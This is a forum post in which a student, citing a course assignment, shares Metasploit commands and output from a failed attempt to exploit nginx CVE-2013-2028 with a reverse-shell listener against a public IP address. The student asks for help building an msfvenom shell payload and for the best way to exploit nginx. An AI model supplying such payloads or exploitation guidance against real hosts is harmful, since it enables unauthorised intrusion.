Hello world!
I currently studying the system engineering carrer. And one of the course named “Data security”. In one ficticius case, The professor order to exploit a host(really is a vmware virtual machine) of “Aeronautical company(in this case could be Boeing or Lockheed)” and later expose him some recomendations in order to avoid future intrumission. This is part of exam or academic activity. Well, I made a vulnerabily scaning with nse script and the scanner return me the following vulns:[CVE-2013-2028] The ngx_http_parse_chunked_function(in CVE database) and return me the exploitdb as well [25775] Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit). I download the script and followed the next steps:
msf6 exploit(linux/remote/25775) > set ReverseListenerBindAddress 192.168.1.13 #I set my private ip
ReverseListenerBindAddress => 192.168.1.13
msf6 exploit(linux/remote/25775) > set LHOST 190.*******121 #I supposed due the host is remote, I should set my ip public.
LHOST => 190.205.6.111
msf6 exploit(linux/remote/25775) > set ReverseListenerBindPort 4444
ReverseListenerBindPort => 4444
msf6 exploit(linux/remote/25775) > set LPORT 4444
LPORT => 4444
msf6 exploit(linux/remote/25775) > run
But this is what msfconsole return me:
[*] Started reverse TCP handler on 192.168.1.13:4444
[*] 200.2.15.150:80 - 200.******:80 - Searching for stack canary
[*] 200.2.15.150:80 - 200.******175:80 - Assuming byte 0 0x00
[*] 200.2.15.150:80 - 200******175:80 - Bruteforcing byte 1
[*] 200.2.15.150:80 - 200******175:80 - Bruteforcing byte 2
[-] 200.2.15.150:80 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (200.*****175:80) timed out.
[*] Exploit completed, but no session was created
Now, I’d like to make clear some of my consideration.
First: At the begining, I though that could be a firewall blocking the conection on port 4444. So i used the comand sudo ufw allow 4444 and return me the message: Rule Added(v6). But still without working.
Second: I believe the main error is the payload. I saw in other examples that I must to create a payload with msfvenom who adapts better to default exploit. But the problem is that I tried without any satisfactory result. Could you please tell me how to create a payload that open a shell on virtual machine. The host executes linux kernel 4.4x(probably is ubuntu 16.04).
Third: If you know the nginx server, could you please tell me what is the best way to exploit one?
Pd: This is not way a illegal activities, just is a evaluted activity that course professor orders to do
Thanks and I’d apreciate the help!